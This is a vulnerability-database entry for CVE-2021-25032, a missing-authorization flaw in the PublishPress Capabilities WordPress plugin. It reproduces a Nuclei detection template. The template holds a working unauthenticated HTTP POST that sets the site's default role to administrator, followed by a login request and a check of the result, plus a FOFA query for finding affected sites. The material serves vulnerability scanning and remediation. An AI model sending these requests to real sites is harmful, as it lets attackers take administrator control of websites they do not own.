CVE-2021-25032: PublishPress Capabilities < 2.3.1 - Missing Authorization

日期: 2025-08-01 | 影响软件: PublishPress Capabilities | POC: 已公开

漏洞描述

The PublishPress Capabilities plugin for WordPress before 2.3.1 does not have proper authorization and CSRF checks when updating settings via the init hook, allowing unauthenticated attackers to update arbitrary blog options, such as setting the default role to administrator.

PoC代码[已公开]

id: CVE-2021-25032

info:
  name: PublishPress Capabilities < 2.3.1 - Missing Authorization
  author: ritikchaddha
  severity: critical
  description: |
    The PublishPress Capabilities plugin for WordPress before 2.3.1 does not have proper authorization and CSRF checks when updating settings via the init hook, allowing unauthenticated attackers to update arbitrary blog options, such as setting the default role to administrator.
  remediation: |
    Update the PublishPress Capabilities plugin to version 2.3.1 or later.
  reference:
    - https://wpscan.com/vulnerability/2f0f1a32-0c7a-48e6-8617-e0b2dcf62727/
    - https://plugins.trac.wordpress.org/changeset/2640161
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25032
    - https://github.com/RandomRobbieBF/CVE-2021-25032
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-25032
    cwe-id: CWE-352
    epss-score: 0.56027
    epss-percentile: 0.98029
    cpe: cpe:2.3:a:publishpress:capabilities:*:*:*:*:-:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: publishpress
    product: capabilities
    framework: wordpress
    fofa-query: body="/wp-content/plugins/capability-manager-enhanced"
  tags: wpscan,cve,cve2021,wordpress,wp-plugin,wp,capability-manager-enhanced,authenticated

http:
  - raw:
      - |
        POST /wp-admin/admin.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest

        page=pp-capabilities-settings&all_options=default_role&default_role=administrator

      - |
        POST /wp-login.php?redirect_to=http%3A%2F%2F{{Hostname}}%2Fwp-admin%2Foptions-general.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=pp-capabilities HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - "selected'> Administrator"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100dd3cf0a907c17fb4428a92c70c45a43c529f8f9eecb448fe54da2b89680e9b4a022100ac60d33d6d74982369f34c8d0a1132ba797a63f541a05f5084cbc006279d76d4:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-25032.yaml

相关漏洞推荐